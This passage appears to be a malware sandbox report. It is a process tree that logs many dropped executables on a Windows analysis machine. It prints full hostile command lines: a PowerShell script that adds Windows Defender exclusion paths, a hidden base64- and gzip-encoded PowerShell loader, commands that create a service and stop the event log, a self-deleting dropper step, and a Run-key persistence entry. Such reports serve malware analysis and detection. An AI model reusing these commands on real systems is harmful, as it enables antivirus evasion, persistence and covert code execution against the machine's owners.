        ping -n 10 localhost
        7⤵
        Runs ping.exe
        
        PID:1524
        
        C:\odt\OfficeClickToRun.exe
        
        "C:\odt\OfficeClickToRun.exe"
        7⤵
        
        PID:3996
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\I8setZco4p.bat"
        8⤵
        
        PID:2520
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:3916
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        Runs ping.exe
        
        PID:1712
        
        C:\odt\OfficeClickToRun.exe
        
        "C:\odt\OfficeClickToRun.exe"
        9⤵
        
        PID:1404
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\m3jNUitKc7.bat"
        10⤵
        
        PID:2316
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:1712
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        Runs ping.exe
        
        PID:4908
        
        C:\odt\OfficeClickToRun.exe
        
        "C:\odt\OfficeClickToRun.exe"
        11⤵
        
        PID:4552
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\re37XjgnVO.bat"
        12⤵
        
        PID:4064
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:4008
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        Runs ping.exe
        
        PID:3512
        
        C:\odt\OfficeClickToRun.exe
        
        "C:\odt\OfficeClickToRun.exe"
        13⤵
        
        PID:2476
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\O9J2Ud69mI.bat"
        14⤵
        
        PID:4460
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:2344
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
        Runs ping.exe
        
        PID:4124
        
        C:\odt\OfficeClickToRun.exe
        
        "C:\odt\OfficeClickToRun.exe"
        15⤵
        
        PID:3672
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vUeiK7j9e9.bat"
        16⤵
        
        PID:684
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        17⤵
        
        PID:4676
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        17⤵
        Runs ping.exe
        
        PID:4976
        
        C:\odt\OfficeClickToRun.exe
        
        "C:\odt\OfficeClickToRun.exe"
        17⤵
        
        PID:3204
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pKJ6edTRWc.bat"
        18⤵
        
        PID:4632
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        19⤵
        
        PID:5016
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        19⤵
        Runs ping.exe
        
        PID:432
        
        C:\odt\OfficeClickToRun.exe
        
        "C:\odt\OfficeClickToRun.exe"
        19⤵
        
        PID:2096
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\r3ED9wUyR4.bat"
        20⤵
        
        PID:8336
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        21⤵
        
        PID:8776
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        21⤵
        Runs ping.exe
        
        PID:9288
        
        C:\odt\OfficeClickToRun.exe
        
        "C:\odt\OfficeClickToRun.exe"
        21⤵
        
        PID:10088
- C:\Users\Admin\AppData\Local\Temp\Files\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\setup.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:352
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # Elevate privileges if (-not (IsAdministrator)) { $proc = New-Object System.Diagnostics.Process $proc.StartInfo.WindowStyle = 'Hidden' $proc.StartInfo.FileName = [System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName $exclusionPaths = '${env:ProgramData}','${env:AppData}','${env:SystemDrive}\\' $proc.StartInfo.Arguments = '-Command "Add-MpPreference -ExclusionPath ""' + ($exclusionPaths -join ',') + '"""' $proc.StartInfo.UseShellExecute = $true $proc.StartInfo.Verb = 'runas' $proc.StartInfo.CreateNoWindow = $true try { $proc.Start() | Out-Null $proc.WaitForExit() | Out-Null [Environment]::Exit(1) } catch [System.ComponentModel.Win32Exception] { if ($AdminRightsRequired) { continue } else { break } } } else { break } } } function IsAdministrator { $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent() $principal = New-Object System.Security.Principal.WindowsPrincipal($identity) return $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator) } Get-Win"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4460
- - C:\Users\Admin\AppData\Local\Temp\Files\win.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\win.exe" x -o- -pjryj2023 .\plugin1.rar .\
    3⤵
    PID:8944
- - C:\Users\Admin\AppData\Local\Temp\Files\setups.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\setups.exe"
    3⤵
    PID:9608
- C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"
  2⤵
  PID:4132
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1372
    3⤵
    - Program crash
    PID:3128
- C:\Users\Admin\AppData\Local\Temp\Files\15c63318bd5a529e599e5d60302f2dc14961ebcc209b735796efbfdb4c1d59fd.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\15c63318bd5a529e599e5d60302f2dc14961ebcc209b735796efbfdb4c1d59fd.exe"
  2⤵
  PID:3132
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\1.vbs"
    3⤵
    PID:540
- - C:\Windows\Temp\tel.exe
    "C:\Windows\Temp\tel.exe"
    3⤵
    PID:3292
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:1544
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 132
      4⤵
      Program crash
      PID:4996
- - C:\Windows\Temp\fcc.exe
    "C:\Windows\Temp\fcc.exe"
    3⤵
    PID:4768
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\bebra.exe\bebra.exe
      4⤵
      PID:3352
- - C:\Windows\Temp\jjj.exe
    "C:\Windows\Temp\jjj.exe"
    3⤵
    PID:3624
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:2396
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 132
      4⤵
      Program crash
      PID:164
- C:\Users\Admin\AppData\Local\Temp\Files\she.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\she.exe"
  2⤵
  PID:4688
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBDAHQAOABLAEYAMABDAEEANwBWAFcALwAyAC8AYQBSAGgAVAAvAHUAWgBYADYAUAAxAGcAVABFAHIAWgBHAHcAUwBZAGsAVABTAHQAVgBtAGcAMAAyAHQAZwBzAEUATwBHAHcAQwBHAGEAcQBNAGYAZABnAFgAegBsADkAaQBuAHcATgAwADIALwArACsAZAA0AEQAVABiAEcAMgAzAGQAdABLAHMAUgBOAHkAOQBlADEAOAAvADcANwAxADcAdAB5AGsAVABuADUARQAwAEUAYgB5AHMARgBIADUANwA5AGYATABGADIATQB1ADkAVwBCAEIAcgBzAFcARQAyAGgARgBvAHgARwAwAGsAdgBYAGcAQwA1ADkAaABnAGsAdwBuAHQAQgB2AEYATwB6AHIASgBmAEcASABrAGwAVwA3ADkANQAxAHkAegB6AEgAQwBUAHYAdABtADMAMwBNADEASwBMAEEAOABaAG8AUwBYAEkAaQBTADgATABzAHcAagAzAEMATwBYADkAKwBzADcANwBIAFAAaABOACsARQAyAHMAZABtAG4ANgBaAHIAagA1ADcAWgBEAGwAMwBQAGoANwBEAHcAVwBrADAAQwBmAGoAWgBJAGYAWQArADcAMABrAFEAWgBKAFUAeQBzAC8ALwBwAHIAWABiAHAANwByAGEAeQBhACsAawBQAHAAMABVAEsAcwBvADAAUABCAGMATgB3AE0ASwBLADEATAB3AGgAOABTAE4AegBnADcAWgBGAGkAcwBEADQAbQBmAHAAMABXADYAWQBjADAANQBTAFMANwBhAFQAUwBjAHAAdgBBADAAZQBnAGIAWgBIAFAATQBRAHMAUwBvAE8AaQBMAGsARQBRADgASgBkAGoAVgB1AGEASgB3AE0AUABoADgAcQBkAFQAcwBRADcATABjAFoANwA2AGEAaABEAGsAdQBDAGoAcQBEAGUARwBPAGEANwA1AGIAcgBYADQAUgA3ADgANQBtAHAAMgBYAEMAUwBJAHkAYgBWAHMASgB3AG4AbQBZAEkANQA0AC8ARQB4ADAAWABUADkASgBLAEEANABpAG4AZQByAEUAQQBLAHMAWgB3AGsANABVAHEAUwBnAE8AMAB4ADMAVwBLAHgAbABwAFMAVQBOAG8AUQBmAFUAUwBPAE8AOABLADQAQwA3AFgAdQBGAHgATwBkAEMAdwBEAFYAbQB1AGQAUwBBAEwASAA0AFoANQBqAEEATgBTAG8AcABQAGcAdgBXAHYAKwBNAGsAVABMADgARgAzAFQAagA3AEEAOQBzAGUAcgBsADYAOQBlAGIAcQBvADYAVwBmAGQAdgA3AFAAYgB6AFMAbwBIAFYAaQA3AHYAagBHAG8ATgB6ADQAagBnAHQAeQBKAEgAeAB2AFMAQQAzAGgAQwBIAFkAOABWAGkAYQBIADIAQgBiAG0AKwBVAGwAbABsAFoAUAAwAEEAcQAxADUAUABIAGoAeAA3AHoAeABiAFEAVgBLAHgAUQAyADgAaAAxADAARwBsAEQAcwAzAEoAYwBFAEsASgBNADcAcAByAEoAVQBhADgAagBqADkAMgAyAFgAWgB3AHgAdQBTADQATgA0AGgAOABXAEwAaQBWADUAVQBuAGYAZwAxAGsAdgBLAEgANABHAEcAUwB6AFkAaAB1AEIAVAAyAEwAOQBmAEkAQwBEAEgAcQBZADQAOQBCAGoASABqAGUAZgA2AEMAegBFADkASgB1AHgASgBWAGkAcwBKAEQAWABDAHUAKwBwAEMAbwBBAHIAeQBDAEgARQBwAC8AZABlAGEAVQBDAHIARgB1AEoAVQBNAGMAQQAwAGEAbgBQAFIAUgBmAGIAUQBQADEAagBpAHYAdQBjADQAMABmAEsAdQB0ADgARAAwAHoAMQBMAHYAVwBLAG8AaQBHAE0AUwAyAGcANAB2AHkARQBnADcARgBFAGMATgBBAFEAMQBLAGMAagA1AFMAQwAxAFoAZQBsAHoAVwBQADcAcwA3AEwAQwBrAGoAdgBsAGUAdwBTAHQAMQBLAHEAbgBBADgAMgArAHUAbQBTAGMASAB5ADAAbwBlADAAUQBlAHcAegBsAEcARwBmAGUASgBSAEQAMABSAEIATQBFAG0ARAB0AGcARQBoAFkAMgBhADEALwBGAFkAaQB1AFIAeQBuADAAQQBXAGgANgBoAEUAUQBBAGgAUQBPAEEARwBDACsARwBIAEYAdwA4AEoAVgA1AHEASQBzAHkAcwBPAEsATQA0AEIAcQBaAGoANgB4AHYAVQBDADYASABSAHoAKwBWACsATABCADgAdgB4AEUASAA5ADcAeQA1AFcAOQBYAHcAcQBYAGcANQBHAGgAYwBJAHoAQgB5AEgARABpAEsAYQBzAEkAYgBnAGsAWgAzAEMARABjAEcAQwBoAGkAdgA2AGoAKwBXAGQAMwB4ADkARwBSAGIAbwA3AFAAdQBSAEMAcgBIAHIAbgBUAEQAbwB3AFgAZABtADIAagB2AGUARQAxAGUAYwBiAGwAaQBFAEwATwBBAEEARQBqAFQAMgBQAE4ASwAvAEIAVgA1ADMAUgBQAGkARAArADEAZABOAEsANwBIAFAAZgBTAFQAeQBwADgAdQBqAEcAZAB1AEIAcAB5ADMASwBVADEARABHAHkASwBMAEkAWQBXAE8AaABrADQAVQBXAFEAUgB4AFEAcABoAGYAMwBEADAAYwBNAHoAawA3AE0ATgBzAFoAdABxAG8AWgA2AHAANQBiAHgAOQB0AFYASwB1AHcAZABGAE0ANwBUAEIAUgBOADkAVQAzAHkAeAByAFUAMQB4AHcARQA1ADAAaAAxAE0ANwB2AGUAVwBHAG0AaAB4AGUAQgBzAHUAdQBqAHQAcgBIAE4AMQBhAFkASwBnADcAQwBLADAAUQBmAGoAVQByADgAagBWADUASwBZAGUAYQBiAEgAUQBIAFMASQB0ADAASQBxAHMAaABtAHAAaQBUAGoAcgBLADAAVwB0AGQAVQBJADUAKwBRAGgAVgBSAHoALwBtAFQAdgB5AFkANwBlADYAWgBpADMAKwA1AGsANgBHAHQAcABxAFoATgB3AEUAaAB0AEkAMgBqAHYASgBiAEwAcgAvAGMAOQBnAGMAOQAvAGIAagAzACsAWAA2AHkASwBIAFMAaQBnAHgAMwBkAFcARQB6AGMAQwBNAC8AZABUAEoAdgByAHgAbgBMAGkAWgBsAGIANAA4AHkANgBjAHUASQBOAFcAeAA0AGcAMABvAEYAdABrAFAAOABoAFEAQwB6ADUARgBBAFIAegBZAEQASwAwAHYATAA3AHoANQBaAGIAYQBPAFgAUgBrAHcAbQBpAE0AcgBpAFoAQwAvADYAYwA1AE0AUAA5AFoAYQBMAGQAZABSAFIAaABiAEIAeABtAHkAKwBsAGYAYwA3AFgAZAA0AGYAMwBCAEgASQBwAEYAZAB1AEUAaQBjAGMAVgBuAFgAYwBjAHEAOQBVAG0AYQArAFUAdwBiADAAdQAzADMAUQA3AG4ANABhAGsAYwB4AGoAZQBXACsAcAA4AFMAKwB5AGQAawA1AGkANwBjAFEARwBBAGEASwBPAGgAVAAyAGQATwBPACsAMAA1AGMAbgB6AGwAZAB1AEwATgBuAHMATwBrADkAbABvAEsAagBxADcANABhAHQARAB1AEsASABQAGQALwByAEIAbwA3ADQAMABnAGQAZwAwADMAcABzAGkAUgA5AHoATQBrAEwAMwBmAHIAZABqAEQARwBqAGkAMwA3AC8AWAAyADYAdgBOAGUAcwBtAGIATwBQAC8AZgBsADEARwB6AHQAVQBXAFoAdQBHAHUAWgB4AGYAVABpAGYAYgA2AFcAQwA1AG4AUgBxAEIAcQBZADIASABjAFQAWgBCAE8AbAAwAHUANQBCAEYAQwAyADYAVwAxAGIAbAA5ADIAWgBzAGwAawBqAC8AWABvAEIAbwBJAHkAcAAzAEoARQBQAGQAbQAvAGMAQgBMADEAMAAxAG8AWgBRAGYAUQB5AGMAeABQAGEAQwA1AHoAcABoAFUAdQBVAE4AcAA1AGYATABtAGQAeAB0AGgAdwA0AEkAdwBkADAAZQA0AHYAMgA1AFIASgBOAE4ASQB2ADQASABBAHQAagB3AFgAUABtAHkASwBTAGoAOQBqADYARQAwAFIARQBJAGIAUQBKAFkAMgBmAHYAcgBRAGUANgBpAHoAcAB2AFcAVwB4AGQANABsAHcAOQBkACsAdABZAGkARwArAFAAQgBWAEQATABrAFcAUwBxAFUAbwBtAFkAVAByAEQAMQBvAGsAQgArADAAegBwAFIAcABkAHQAVwB2AGMAQQBTAGQAcQBxAE4AawBuAEoAOQBqAGQAYwBKAEwAQgB2AHkASQAzAE8AKwBiAGoAeQAxAGwAYwBhAHMARwAwADcAZgBXAC8AcgBwAHYANgBUAHQAVgBCAFgAbgA5AHUAbgBjAGIAVgB2AEoAbwAzAEIAbwBIADYAaQBCAC8ASwBDAE8AWABrAHgAeQBGAFAAawB5AE0AegBDAFkAQQBTAEMAZgBTAHcARABkAG8AQQAvAFUAbwB0ADgAaQBNAE0AWAAyAFMAcwAwAGQAZwBoADkAaQBYADgASAAvAHQARQBMAHUAOQBCAFoAdQBxAEcAaAA1ADkAMwBWAEMANwBqAEQANwBNAEMAYgBhAE8ANwBEAHkAdQA4AEgAbwBTADgAdABvAHUAWQBtACsAZwBRAFgAMwB2AE8AdQBCAFgAWQBDADkAMgBTAHYAUwBnAEcAcABSAGoAcwBHAE8AZQBQAFcAKwA5AGQAZAA3AC8AeABOAHMAYgArAHIAdQBXAEIAcwArADYAOQBsAHMAagBkACsAagBsAFIAZQBSAFIANgBHAFkAWQBwAHQAVQBkAGEAcQBTADUAYwBSADYAUQA0ADUAUgB3AEMAVgBIAGsARAA2AG8AdAB6AGgATgBNADQAVQBVAEMAYgA1AGIAcQBHAGwASQBwAFQAWAAwACsAbgBFACsAVABGAEYANABHAHAAMwBuAE4AbgB3ADgATwBMAEMALwBhAFgAMQAxAEoAdwBoAE8AagA5AEgAbABzAFYANgBSADMANwA1AGIAZwBKAFoAOABjADIAcAB2AG0AQQBDAGMAaABpAHgAcgB5AC8AawBLAFcAWQBRAGIATAArADQANABNAEkAWAA1AC8AWQBOADAAMABPADQAaABjAFUANABPAFAAYwBJAEQAbAByAEoAYwBlADkAVQByADgAcQBxAHYAUgBjAHAAagA4AHIAMgBpAGQANwA5AGMASQBmAG8ASgAvAFIAZQBzAHoANwBSADkATwB2AHcAdABCAHUAYwBIAGoALwBZAEwANABWADgASQBQAG8AZgBtAGoAZwBjADgAOQB3AG8AQQBSAHcAWAB5AGcAKwBQAFIAQwArAFUAYgA4ADUAOABKADQAOQBvAGoAagBXAFkARwA4AGIAOAA0AGYAZgA0AFAAZgBsAE8AegAxAEMATgA1ADIAcgAxADcAKwBDAFEAZABYAFAAMQBqAHIAQwB3AEEAQQAnACcAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
    3⤵
    PID:3912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
      4⤵
      PID:1240
- C:\Users\Admin\AppData\Local\Temp\Files\1234daisaaaaa.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\1234daisaaaaa.exe"
  2⤵
  PID:3664
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2316
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4976
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
      4⤵
      PID:6848
- C:\Users\Admin\AppData\Local\Temp\Files\net.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
  2⤵
  PID:984
- - C:\Users\Admin\AppData\Local\Temp\BBLb.exe
    "C:\Users\Admin\AppData\Local\Temp\BBLb.exe"
    3⤵
    PID:1272
- - C:\Users\Admin\AppData\Local\Temp\Files\net.exe
    C:\Users\Admin\AppData\Local\Temp\Files\net.exe
    3⤵
    PID:4140
- - C:\Users\Admin\AppData\Local\Temp\Files\net.exe
    C:\Users\Admin\AppData\Local\Temp\Files\net.exe
    3⤵
    PID:3664
- C:\Users\Admin\AppData\Local\Temp\Files\M5traider.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\M5traider.exe"
  2⤵
  PID:364
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:3208
- C:\Users\Admin\AppData\Local\Temp\Files\amert.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\amert.exe"
  2⤵
  PID:4960
- C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
  2⤵
  PID:4396
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    3⤵
    PID:5424
  - - C:\Users\Admin\AppData\Roaming\update.exe
      "C:\Users\Admin\AppData\Roaming\update.exe"
      4⤵
      PID:6564
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "CGMNDIHH"
        5⤵
        Launches sc.exe
        
        PID:6808
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "CGMNDIHH" binpath= "C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:4632
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\update.exe"
        5⤵
        
        PID:5680
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:2088
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "CGMNDIHH"
        5⤵
        Launches sc.exe
        
        PID:5748
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:6212
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    3⤵
    PID:5416
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Musical_rhythms_for_certain_actions';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Musical_rhythms_for_certain_actions' -Value '"C:\Users\Admin\AppData\Local\Musical_rhythms_for_certain_actions\Musical_rhythms_for_certain_actions.exe"' -PropertyType 'String'
    3⤵
    PID:5520
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    3⤵
    PID:5408
- C:\Users\Admin\AppData\Local\Temp\Files\daissss.exe
